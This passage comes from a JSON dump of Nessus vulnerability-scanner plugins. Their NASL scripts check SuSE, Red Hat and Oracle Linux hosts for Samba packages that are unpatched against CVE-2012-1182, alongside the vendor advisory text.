script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"cifs-mount-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"libsmbclient0-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"libtalloc1-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"libtdb1-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"libwbclient0-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"samba-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"samba-client-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"samba-doc-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"samba-krb-printing-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"samba-winbind-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"cifs-mount-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libsmbclient0-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libsmbclient0-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libtalloc1-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libtalloc1-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libtdb1-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libtdb1-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libwbclient0-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libwbclient0-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"samba-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"samba-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"samba-client-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"samba-client-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"samba-doc-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"samba-krb-printing-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"samba-winbind-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"samba-winbind-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"cifs-mount-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"ldapsmb-1.34b-11.28.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"libsmbclient0-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"libtalloc1-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"libtdb1-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"libwbclient0-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"samba-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"samba-client-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"samba-doc-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"samba-krb-printing-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"samba-winbind-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"libsmbclient0-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"libtalloc1-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"libtdb1-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"libwbclient0-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"samba-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"samba-client-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"samba-winbind-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"libsmbclient0-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"libtalloc1-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"libtdb1-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"libwbclient0-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"samba-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"samba-client-32bit-3.4.3-1.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"samba-winbind-32bit-3.4.3-1.38.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:43", "description": "Updated samba3x packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and Red Hat Enterprise Linux 5.6 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls, resulted in multiple buffer overflows in Samba. A remote, unauthenticated attacker could send a specially crafted RPC request that would cause the Samba daemon (smbd) to crash or, possibly, execute arbitrary code with the privileges of the root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which contain a backported patch to resolve this issue. After installing this update, the smb service will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-11T00:00:00", "type": "nessus", "title": "RHEL 5 : samba3x (RHSA-2012:0466)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:samba3x", "p-cpe:/a:redhat:enterprise_linux:samba3x-client", "p-cpe:/a:redhat:enterprise_linux:samba3x-common", "p-cpe:/a:redhat:enterprise_linux:samba3x-doc", "p-cpe:/a:redhat:enterprise_linux:samba3x-domainjoin-gui", "p-cpe:/a:redhat:enterprise_linux:samba3x-swat", "p-cpe:/a:redhat:enterprise_linux:samba3x-winbind", "p-cpe:/a:redhat:enterprise_linux:samba3x-winbind-devel", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.6"], "id": "REDHAT-RHSA-2012-0466.NASL", "href": "https://www.tenable.com/plugins/nessus/58673", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0466. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58673);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0466\");\n\n script_name(english:\"RHEL 5 : samba3x (RHSA-2012:0466)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba3x packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and Red Hat Enterprise Linux 5.6\nExtended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0466\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1182\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0466\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba3x-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-client-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-client-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba3x-client-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-client-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-client-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-client-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-common-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-common-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba3x-common-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-common-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-common-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-common-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-doc-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-doc-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba3x-doc-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-doc-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-doc-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-doc-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-domainjoin-gui-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-domainjoin-gui-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba3x-domainjoin-gui-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-domainjoin-gui-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-domainjoin-gui-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-domainjoin-gui-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-swat-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-swat-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba3x-swat-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-swat-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-swat-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-swat-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"samba3x-winbind-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", reference:\"samba3x-winbind-3.5.10-0.108.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"samba3x-winbind-devel-3.5.4-0.70.el5_6.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", reference:\"samba3x-winbind-devel-3.5.10-0.108.el5_8\")) flag++; }\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-doc / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:54:03", "description": "From Red Hat Security Advisory 2012:0466 :\n\nUpdated samba3x packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and Red Hat Enterprise Linux 5.6 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls, resulted in multiple buffer overflows in Samba. A remote, unauthenticated attacker could send a specially crafted RPC request that would cause the Samba daemon (smbd) to crash or, possibly, execute arbitrary code with the privileges of the root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which contain a backported patch to resolve this issue. After installing this update, the smb service will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : samba3x (ELSA-2012-0466)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:samba3x", "p-cpe:/a:oracle:linux:samba3x-client", "p-cpe:/a:oracle:linux:samba3x-common", "p-cpe:/a:oracle:linux:samba3x-doc", "p-cpe:/a:oracle:linux:samba3x-domainjoin-gui", "p-cpe:/a:oracle:linux:samba3x-swat", "p-cpe:/a:oracle:linux:samba3x-winbind", "p-cpe:/a:oracle:linux:samba3x-winbind-devel", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2012-0466.NASL", "href": "https://www.tenable.com/plugins/nessus/68507", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0466 and \n# Oracle Linux Security Advisory ELSA-2012-0466 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68507);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2012:0466\");\n\n script_name(english:\"Oracle Linux 5 : samba3x (ELSA-2012-0466)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0466 :\n\nUpdated samba3x packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and Red Hat Enterprise Linux 5.6\nExtended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-April/002737.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba3x packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif 